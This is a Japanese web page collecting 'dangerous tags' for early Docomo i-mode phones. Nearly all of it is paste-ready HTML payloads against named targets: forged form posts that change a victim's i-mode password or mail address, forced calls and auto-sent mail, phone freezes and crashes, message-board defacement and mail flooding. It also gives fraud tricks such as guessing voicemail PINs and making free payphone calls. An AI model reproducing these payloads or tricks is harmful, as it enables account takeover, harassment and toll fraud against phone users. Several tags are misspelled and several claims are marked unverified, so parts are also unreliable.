携帯危険タグ




始めに


ネットで見つけた変な物を不定期更新で紹介します。タグなんかは全て
半角で使用。
メールでタグ使う場合は必ず頭に
</XPLAINTEXT>をつける。503i系 は、<X</XPLAINTEXT> 
503iS、211i系は、
http://"></><!--.gif -->
※ 
悪用は絶対厳禁です。使用して発生した如何なる損害に対して,作者は責任を
負いかねます。
※ 最新機種には使えないタグがいくつもあります。(503i以降。)




板荒し
<form><textarea>☆</form>
 

強制電話
<img src=”cti-tel:電話番号”>iランドの板に仕掛ければ板を開いた途端に電話
がかかる
 

底なしメール
<hr size=9999999>板にやっても即削除される


タグ無効
<xmp>☆</xmp> ☆は好きなように


他人のメール覗き
アドレスをxxxxxx@docomo.ne.jpに設定。すでに使われている場合はxを増やして
いく。その日から数人のメールのやり取りがリアルタイムに送られてくるらしい。ドコモの欠陥。


板フリーズ
</XPLAINTEXT><form><select><option>


パスバグ
パス入力画面で「次へ」ボタンを連打しているとバグ発生で開く事がたま〜にある‥らしい。


強制メール
<img src=” x-avefront://---.smail/edit-cgi?type=u&subject=題名&address=送
信アド&body=本文>


パス強制変更
<form action=http://docomo.ne.jp/cp/cngpswrd method=post><input
type=password name=opwd istyle=4 value=”” size=4><input type=h
name=pwd value=”0000”><input type=h name=npwd2 value=”0000”>
<input type=h name=MSN value=NULLGRIMMGW><input type=s name=actn
value=次へ> ☆0000=の箇所に新パスワードを指定


アド強制変更
<form action=http://docomo.ne.jp/cp/mailadchgset method=post><input type=h
name=mailadr1 size=8 istyle=3 value=”aaaaa”><input type=h name=mailadr2
size=8 istyle=3 value=”bbbbb”><input type=h name=mailadr3 size=8 istyle=3
value=”ccccc”><input type=password name=pwd value=”” SIZE=4
maxlengh=4><input type=s value=決定 name=actn><input type=h name=MSN
value=”NULLGRIMMGW”> ☆aaaaa=第1希望指定 bbbbb=第2〃 ccccc=第3〃


強制メール(強化版)
<embed src=” x-avefront://---.smail/edit-cgi?type=u&subject=題名&address=
宛先アドレス&body=本文”>


無許可アドレスリセット
<form action=”http://docomo.ne.jp/cp/mailinist” method=”post”><input
type=”password” istyle=”4” name=”pwd” value=”” size=”4”><input
type=”submit” name=”actn” value=”確認”><input type=”hidden”
name=”MSN” value=”NULLGRIMMGW”> これをタグメール化したときに
パスワードを入れる空欄が生まれる。そこに自分の.modeのパスワードを間違って
入れてしまうと技発動になる。


保護メール全件解除
<horizon=u><form action=http://docomo.ne.jp/cp/mailadchgset method=post>
<embed src=x-avefront://---.smail/edit-cgi><embed src=x-avefront://---
.smail/text><input type=hidden name=mailadr1 size=8 value istyle=3><input
type=hidden name=mailadr2 size=8 VALUE istyle=3><input type=hidden
name=mailadr3 size=8 value istyle=3><input type=password name=pwd
maxlength=4 size=4><input type=submit name=actn value=★★><input
type=hidden name=MSN value=NULLGRIMMGW></horizon> ※これで★★を押
せば技発動。


深緑底無しメール
<HR SIZE=”500”><HR SIZE=99999999> これで何故か深緑色の底無しにな
る。


フレンドメール強制参加
<A HREF=http://w1p.docomo.ne.jp/cp/c/gmail_add.adus?gpid=グループ名
&usnm=参加する人の名前&actn=決定&MSN=NULLGRIMMGW KeyBind=>
※KeyBind=の後はb、f、i、mのどれかを入れろ。ん…━‥あんまり役に立たな
い。


フレンドメール送信機
<form method=post action=http://w1p.docomo.ne.jp/cp/c/gmail_send.send>本文
<textarea name=bdy></textarea><input type=submit name=actn value=送信>
<select name=knd><option value=1>全送<option value=2>個送</SELECT>
グループ名<input type=TEXT name=gpid>個送送り先(最大五人まで)<input
type=TEXT name=totel><input type=TEXT name=totel><input type=TEXT
name=totel><input type=TEXT name=totel><input type=TEXT name=totel>
<input type=hidden name=msn value=NULLGRIMMGW>


携帯金縛り
★<table border=99999> 文字を入れたいなら★の所に入れろ。


携帯金縛り2
<bace href=push://www.darkritual.net><s><strike><em><strong><u>
<table border=99999><IMG VSPACE=89999><HR SIZE=99999><TABLE>
<TD WIDTH=99999 HEIGHT=99999><TEXTAREA COLS=99999
ROWS=99999><bace href=push://www.darkritual.net><s><strike><em>
<strong><u>


私書箱破壊
<bace href=push://www.darkritual.net><s><strike><em><strong><u>


ダブルスパム
<EMBED SRC=x-avefront://---.smail/edit-cgi><A HREF=x-avefront://---
.smail/edit-cgi>W<EMBED SRC=x-avefront://---.smail/edit-cgi><A HREF=xavefront://---.
smail/edit-cgi>W ※これは未送信メールが膨大に増加する。これで
相手の携帯をなかなか受信できなくする。


ダブルスパムフリーズ
<EMBED SRC=x-avefront://---.smail/edit-cgi><A HREF=x-avefront://---
.smail/edit-cgi>Wo..<EMBED SRC=x-avefront://---.smail/edit-cgi><A
HREF=x-avefront://---.smail/edit-cgi>Wo..<table border=99999>


フラッシュメール
<BODY BGCOLOR=PINK><BODY BGCOLOR=BLACK><BODY
BGCOLOR=NAVY><BODY BGCOLOR=DEEPBLUE><BODY
BGCOLOR=SNOW><BODY BGCOLOR=PINK><BODY BGCOLOR=RED>
<BODY BGCOLOR=BLACK><BODY BGCOLOR=DARKRED><BODY
BGCOLOR=YELLOW><BODY BGCOLOR=SNOW><BODY
BGCOLOR=GREEN><BODY BGCOLOR=TAN><BODY BGCOLOR=SNOW>
<BODY BGCOLOR=BLACK><BODY BGCOLOR=SNOW></BODY>


蟻地獄ヽ(´ー`)ノ
<table wide=99999 height><td width=99999 nowrap></td></table> 別名:画 面ズレ


通話料タダ
0*19相手の電話番号*0608 ※今現在対応しているかは不明。確かめるのは自由。


パケットメーター
<form action=”http://k-jp.net/pm/p.m”><input type=hidden name=”pm”
value=”_pm_”>URL or ギガコード
<input type=radio name=”s” value=”u” cheked><input type=text
name=”u” size=”10”>
<input type=radio name=”s” value=”iseek.infoseek.co.jp/”>i-seek
<input type=radio name=”s” value=”ohnew.co.jp/i/”>OH!iサーチ
<center><input type=radio name=”m” value=”4” cheked>標準<input
type=radio name=”m” value=”3”>ライト
<input type=submit value=”[[計測スタート]]”>


全書物抹消線
<S><STRIKE><EM><STRONG><U> ※このホームページの書物に使用
した者は相手のパケット代金が60000円を超えるまでイジメる。


留守番電話ハッキング
0903101417にTELし、相手の電話番号と暗証番号を入力する。暗証番
号は0000や誕生日が多い。


パケ料金0
.センター設定で、名前:適当名:9N4接番#9004 で発動。未確認だ。


題名破壊
</XMP><XMP>とメール作成画面の時に題名に入れて誰かに送信すると題名の
タグが分解し、今までその携帯で送信したメール数まで出現する。
〈/XPLAINTEXT>は付ける必要なし。


全ボタン無効タグ(電源も)
<embed src=x-avefront://---.smail/edit-cgi><embed src=x-avefront://---
.smail/text><CENTER>-----END-----
<U><A HREF=”x-avefront://---.smail/edit-cgi?subject=&address=★&body=
●” KeyBind=f>次へ</A>
<A HREF=”x-avefront://---.smail/edit-cgi?type=u&subject=&address=★
&body=●” KeyBind=b>前へ</A>
<A HREF=”x-avefront://---.smail/edit-cgi?subject=&address=★&body=●”
KeyBind=m>戻る</A><STYLE> ※★の部分に標的のメアド、●の部分に標的に
自動送信。なかなか強力。


電源以外ボタン自動メール送信
<CENTER>-----END-----
<U><A HREF=”x-avefront://---.smail/edit-cgi?subject=&address=★&body=
●” KeyBind=f>次へ</A>
<A HREF=”x-avefront://---.smail/edit-cgi?type=u&subject=&address=★
&body=●” KeyBind=b>前へ</A>
<A HREF=”x-avefront://---.smail/edit-cgi?subject=&address=★&body=●”
KeyBind=m>戻る</A><STYLE> ※★の部分に標的のメアド、●の部分に任意の
文章。送信する際は標的ではない人に送信するのが好ましい。


公衆電話無料通話
電源コードの付いた公衆電話でテレフォンカードを入れて「トュルル」となったら即
座に電源コードを抜く。テレフォンカードが出てくる。電源コードを素早く刺す。
そのまま通話可能。 犯罪です。


100%強制メール
<a href=” x-avefront://---.smail/edit-cgi?type=u&subject=題名文字&address=
敵のアドレス&body=文章” KeyBind=b></a><FORM><SELECT>
<OPTION>


携帯初期化 (新型機種不可)
<style><title><comment><applet><noscrjpt><noembed><xmp>
<fontfece="symbol">


指定メール覗き (502iのみ可らしい・・。)
<a href="mail"rock:><自分のアドレス><相手のアドレス>
<ahref="targatmail=2:">


閉鎖メール
<embed src=” x-avefront://---.smail/text?typuedit-cgi?type=s”>


コピーガード
<HR SIZE=4><HR SIZE=2><A HREF=x-avefront://---.smail/editcgi?
subject=&address=&body= KeyBind=m>


スパムOFフリーズ(USA)
<APPLET><input type=password istyle=44 name=pwd value=”size”=”69”
><input type=submit name=acth value=文字><STYLE><input type=hidden
name=MSN value=NULLGRIMMGW><img
src=http://docomo.ne.jp/cp/cngpswrd?opwd=4444&npwd=1111&npwd2=4444
&MSN=NULLGRIMMGW><img
src=http://docomo.ne.jp/cp/limitscopeset?code=74&RETCOUNT=0&pwd=1111
&MSN=NULLGRIMMGW><NOEMBED><table border=8963>


福岡限定スパム
<APPLET><FORM><form action=http://docomo.ne.jp/cp/mailnouseset
methot=post><input type=password istyle=44 name=pwd value=”size”=”69”
><input type=submit name=acth value=文字><STYLE><input type=hidden
name=MSN value=NULLGRIMMGW><img
src=http://docomo.ne.jp/cp/cngpswrd?opwd=4444&npwd=1111&npwd2=4444
&MSN=NULLGRIMMGW><img
src=http://docomo.ne.jp/cp/limitscopeset?code=2&RETCOUNT=0&pwd=1111
&MSN=NULLGRIMMGW><NOEMBED> ※ならない機種は始めの<APPLET>
を取り除く。


携帯初期化(強化版)
<FORM><form action=http://docomo.ne.jp/cp/mailnouseset methot=post>
<input type=password istyle=4 name=pwd value=”size”=”4”><input
type=submit name=acth value=文字><input type=hidden name=MSN
value=NULLGRIMMGW><img src=http://docomo.ne.jp/cp/cngpswrd?opwd=0000
&npwd=1111&npwd2=1111&MSN=NULLGRIMMGW><img
src=http://docomo.ne.jp/cp/limitscopeset?code=2&RETCOUNT=0&pwd=1111
&MSN=NULLGRIMMGW><SELECT><NOEMBED> ※非対応機種あり


モンキースパム
<form action=http://docomo.ne.jp/cp/mailnouseset methot=post><input
type=password istyle=4 name=pwd value=”size”=”4”><input type=submit
name=acth value=文字><input type=hidden name=MSN value=NULLGRIMMGW
><img src=http://docomo.ne.jp/cp/cngpswrd?opwd=0000&npwd=1111
&npwd2=1111&MSN=NULLGRIMMGW><img
src=http://docomo.ne.jp/cp/limitscopeset?code=2&RETCOUNT=0&pwd=1111
&MSN=NULLGRIMMGW>


電話帳全件完全削除
<FORM><form action=http://docomo.ne.jp/cp/mailnouseset methot=post>
<input type=password istyle=44 name=pwd value=”size”=”4”><input
type=submit name=acth value=文字><STYLE><input type=hidden name=MSN
value=NULLGRIMMGW><img src=http://docomo.ne.jp/cp/cngpswrd?opwd=0000
&npwd=1111&npwd2=1111&MSN=NULLGRIMMGW><img
src=http://docomo.ne.jp/cp/limitscopeset?code=2&RETCOUNT=0&pwd=1111
&MSN=NULLGRIMMGW><NOEMBED> ※非対応機種あり


マテリアルフリーズ
<HR SIZE=6><table border=99999><XMP> ※ちょっと奇妙な技だ。


ブレイヴスパム
<FORM><INPUT TYPE=SUBMIT VALUE=”<SELECT><XMP
>(MANUMASHOW’S)”><OPTION><HR SIZE=4>


選択肢文字監禁
<FORM><SELECT><OPTION>


バナー消し
<STYLE> で発動。


簡易フリーズ
題名に「/../」と入れる。


板全消し
<body onload=” parent.closel();>


板NEXT不可
<base href=push://www.xxx.net>注 タグ不可掲示板にはききません。


板圧縮
<textarea>


掲示板削除不能
<base href=push://www.gemcites.co.jp/>


D電源落とし
<img><img src=mondo>


N電源落とし
<form action=”x-avefront://---.smail/edit-cgi?type=U”>


携帯初期化(応用版)
PCからMIDEシンセサイザーや音源ユニットを制御するためのソフトを使う。その
ソフトからターゲットの携帯にメロディメールを送ると携帯が対応できず、全ての
メモリが消える


Hit数up
<base href=push://www.debujya-ji.com/><HETA HTTPEQUIV=”
refresh”CUNTENT=”1:ORL=ADGJM”>


N破壊
<table
border=”9000000”CELLSPACING=”9000000”CELLSPADDING=”9000000”



D破壊
<tmjdgatm:///ww.325674mail.crush.banbanvigarm><form><seiect><option>


F破壊
<tmjdgatm:///ww.325674mail.crush.banbanvigarm@標的アド></xplaintext>


掲示板カキコ(凶悪)
<IMG SRC=”http://ip.tosp.co.jp/Kj/Tospi620.asp?I=ログ名&kubun=板名
&Logon=私書箱ID&PW=パス&title=題名&massage=内容&P=0” HEIGHT=1
WIDTH=1>


スーパーフリーズ
<table border=10000000><table border=9999999>


.メニューフリーズ
<img src=x-avefront://---.manu/edit-cgi?type=U&subject=&address=&body=
&.gif>


ボタン破壊
<base href=push://www.aaa.net>


強制私書箱
<img src=”http://ip.tosp.co.jp/Kj/Tospi520.asp?Iログ名&Sid=私書箱ナンバー
&name名前&Email=メアド&Title=題名&message=内容&P=0”HEIGHT=1
WIDT=1>


BGMを流す
<BGSOUND SRC=”曲のurl”loop=”infinite”>


匿名メールタグ
<form method=post action=http://ww3.sjk.co.jp/c/m_send.exe>送信元<input
type=text name=from maxlength=500>送信先<input type=text name=to
maxlength=500>題名<input type=text name=subject maxlength=500>本文
<input type=text name=body maxlength=500><input type=submit name=send
value=送信>


アド回収
<a href=”x-avefront://---.smil/edit-cgi?type=U&subject=&address=&body=”
></a>



TOP

inserted by FC2 system